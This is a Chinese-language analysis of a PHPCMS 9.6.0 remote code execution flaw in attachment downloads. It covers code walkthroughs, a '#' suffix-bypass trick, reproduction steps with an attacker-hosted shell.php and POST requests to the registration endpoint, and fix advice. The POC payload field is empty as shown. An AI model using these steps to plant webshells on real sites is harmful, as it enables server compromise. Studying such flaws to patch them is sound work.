PHPCMS 9.6.0 远程代码执行漏洞分析 (CVE-2018-14399)<\/h1>

0x01 漏洞概述<\/h2>
漏洞描述<\/strong>：
PHPCMS 9.6.0版本中的`libs\/classes\/attachment.class.php<\/code>文件存在漏洞，该漏洞源于PHPCMS程序在下载远程\/本地文件时没有对文件类型做正确校验。远程攻击者可以利用该漏洞上传并执行任意PHP代码。<\/p>`
`影响版本<\/strong>：PHPCMS 9.6.0<\/p>`
`漏洞类型<\/strong>：远程代码执行<\/p>`
`危害等级<\/strong>：高危<\/p>`

0x02 漏洞分析<\/h2>
漏洞触发流程<\/h3>


用户注册流程入口<\/strong>：<\/p>

漏洞触发点在用户注册页面<\/li>
主要文件：phpcms\/modules\/member\/index.php<\/code>中的register()<\/code>方法<\/li>
<\/ul>
<\/li>

关键代码段<\/strong>：<\/p>
if<\/span>($member_setting['choosemodel'<\/span>]) {
<\/span><\/span>    require_once<\/span> CACHE_MODEL_PATH<\/span>.<\/span>'member_input.class.php'<\/span>;
<\/span><\/span>    require_once<\/span> CACHE_MODEL_PATH<\/span>.<\/span>'member_update.class.php'<\/span>;
<\/span><\/span>    $member_input =<\/span> new<\/span> member_input<\/span>($userinfo['modelid'<\/span>]); 
<\/span><\/span>    $_POST['info'<\/span>] =<\/span> array_map<\/span>('new_html_special_chars'<\/span>,$_POST['info'<\/span>]);
<\/span><\/span>    $user_model_info =<\/span> $member_input-><\/span>get<\/span>($_POST['info'<\/span>]);                                  
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

可控变量<\/strong>：<\/p>

$userinfo['modelid']<\/code>是用户可控变量<\/li>
通过控制modelid<\/code>可以影响后续执行流程<\/li>
<\/ul>
<\/li>
<\/ol>
核心漏洞点分析<\/h3>


member_input类初始化<\/strong>：<\/p>

文件路径：caches\/caches_model\/caches_data\/member_input.class.php<\/code><\/li>
关键代码：
function<\/span> __construct($modelid) {
<\/span><\/span>    $this-><\/span>db<\/span> =<\/span> pc_base<\/span>::<\/span>load_model<\/span>('sitemodel_field_model'<\/span>);
<\/span><\/span>    $this-><\/span>db_pre<\/span> =<\/span> $this-><\/span>db<\/span>-><\/span>db_tablepre<\/span>;
<\/span><\/span>    $this-><\/span>modelid<\/span> =<\/span> $modelid;
<\/span><\/span>    $this-><\/span>fields<\/span> =<\/span> getcache<\/span>('model_field_'<\/span>.<\/span>$modelid,'model'<\/span>);
<\/span><\/span>    pc_base<\/span>::<\/span>load_sys_class<\/span>('attachment'<\/span>,''<\/span>,0<\/span>);
<\/span><\/span>    $this-><\/span>siteid<\/span> =<\/span> param<\/span>::<\/span>get_cookie<\/span>('siteid'<\/span>);
<\/span><\/span>    $this-><\/span>attachment<\/span> =<\/span> new<\/span> attachment<\/span>('content'<\/span>,'0'<\/span>,$this-><\/span>siteid<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

get()方法中的动态调用<\/strong>：<\/p>

关键代码：
$func =<\/span> $this-><\/span>fields<\/span>[$field]['formtype'<\/span>];
<\/span><\/span>if<\/span>(method_exists<\/span>($this, $func)) $value =<\/span> $this-><\/span>$func($field, $value);
<\/span><\/span><\/code><\/pre><\/li>
通过控制formtype<\/code>可以调用不同的方法<\/li>
<\/ul>
<\/li>

editor()方法中的文件下载<\/strong>：<\/p>

关键代码：
function<\/span> editor<\/span>($field, $value) {
<\/span><\/span>    $setting =<\/span> string2array<\/span>($this-><\/span>fields<\/span>[$field]['setting'<\/span>]);
<\/span><\/span>    $enablesaveimage =<\/span> $setting['enablesaveimage'<\/span>];
<\/span><\/span>    $site_setting =<\/span> string2array<\/span>($this-><\/span>site_config<\/span>['setting'<\/span>]);
<\/span><\/span>    $watermark_enable =<\/span> intval<\/span>($site_setting['watermark_enable'<\/span>]);
<\/span><\/span>    $value =<\/span> $this-><\/span>attachment<\/span>-><\/span>download<\/span>('content'<\/span>, $value,$watermark_enable);
<\/span><\/span>    return<\/span> $value;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

attachment类的download方法<\/strong>：<\/p>

文件路径：phpcms\/libs\/classes\/attachment.class.php<\/code><\/li>
关键漏洞点：

使用#<\/code>字符截断绕过文件后缀检查<\/li>
正则表达式仅检查URL中的文件后缀，但实际下载的文件内容不受限制<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用关键<\/h3>


控制modelid<\/strong>：<\/p>

通过设置modelid=11<\/code>可以调用editor<\/code>方法而非默认的datetime<\/code>方法<\/li>
<\/ul>
<\/li>

文件后缀绕过<\/strong>：<\/p>

使用#<\/code>字符截断：<a href=http:\/\/127.0.0.1\/1.php#1.png><\/code><\/li>
实际下载的是1.php<\/code>的内容，但系统认为下载的是.png<\/code>文件<\/li>
<\/ul>
<\/li>

文件路径获取<\/strong>：<\/p>

由于插入数据库时会报错，错误信息会泄露上传的文件路径<\/li>
<\/ul>
<\/li>
<\/ol>
0x03 漏洞复现<\/h2>
复现步骤<\/h3>


准备恶意文件<\/strong>：<\/p>

在攻击者控制的服务器上放置PHP文件，如http:\/\/attacker.com\/shell.php<\/code><\/li>
<\/ul>
<\/li>

构造恶意请求<\/strong>：<\/p>
POST \/index.php?m=member&c=index&a=register HTTP\/1.1
Host: target.com
Content-Type: application\/x-www-form-urlencoded

siteid=1&modelid=11&username=test&password=test123&email=test@test.com
&info[content]=&dosubmit=1
<\/code><\/pre>
<\/li>

获取Webshell路径<\/strong>：<\/p>

查看返回的错误信息，其中会包含上传的文件路径<\/li>
如：\/uploadfile\/2023\/0512\/20230512012345.php<\/code><\/li>
<\/ul>
<\/li>

访问Webshell<\/strong>：<\/p>

访问http:\/\/target.com\/uploadfile\/2023\/0512\/20230512012345.php<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
复现POC<\/h3>
POST<\/span> \/index.php?m=member&c=index&a=register HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> vulnerable-site.com<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>Content-Length:<\/span> 123<\/span>
<\/span><\/span>
<\/span><\/span>siteid=1&modelid=11&username=attacker&password=Attacker123&email=attacker@example.com
<\/span><\/span>&info[content]=&dosubmit=1&protocol=
<\/span><\/span><\/code><\/pre>0x04 修复建议<\/h2>


官方修复<\/strong>：<\/p>

升级到PHPCMS最新版本<\/li>
<\/ul>
<\/li>

临时修复措施<\/strong>：<\/p>

在attachment.class.php<\/code>的download<\/code>方法中增加严格的文件类型检查<\/li>
禁止从远程下载可执行文件<\/li>
对上传的文件内容进行安全检查<\/li>
<\/ul>
<\/li>

代码层修复<\/strong>：<\/p>
\/\/ 修改download方法，增加真实文件类型检查
<\/span><\/span><\/span><\/span>$file_content =<\/span> file_get_contents<\/span>($file);
<\/span><\/span>if<\/span> (preg_match<\/span>('\/<\?php\/i'<\/span>, $file_content)) {
<\/span><\/span>    unlink<\/span>($newfile);
<\/span><\/span>    return<\/span> false<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x05 总结<\/h2>
该漏洞的核心问题在于：<\/p>

用户可控制调用类方法（通过modelid和formtype）<\/li>
文件下载功能未对实际文件内容进行校验<\/li>
使用#字符截断可绕过文件后缀检查<\/li>
<\/ol>
漏洞利用需要满足以下条件：<\/p>

目标系统允许用户注册<\/li>
攻击者能够控制一个可公开访问的恶意文件服务器<\/li>
系统未对上传的文件内容进行严格检查<\/li>
<\/ol>
此漏洞再次提醒我们，在文件操作功能中必须进行多重验证，包括但不限于：<\/p>

文件扩展名检查<\/li>
文件内容检查<\/li>
文件MIME类型验证<\/li>
文件权限设置<\/li>
<\/ul>